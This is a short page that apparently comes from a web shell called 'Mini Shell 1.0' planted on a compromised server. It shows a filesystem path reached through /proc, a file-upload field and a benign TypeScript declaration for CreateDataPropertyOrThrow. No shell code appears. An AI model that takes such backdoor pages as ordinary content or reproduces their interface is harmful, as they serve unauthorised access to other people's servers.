HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991111/root/usr/share/nodejs/@types/es-abstract/2015/
Upload File :
Current File : //proc/1991111/root/usr/share/nodejs/@types/es-abstract/2015/CreateDataPropertyOrThrow.d.ts
import type { PropertyKey } from '../index';

/**
 * @throws {TypeError} If the property can't be created.
 */
declare function CreateDataPropertyOrThrow(O: object, P: PropertyKey, V: unknown): true;
export = CreateDataPropertyOrThrow;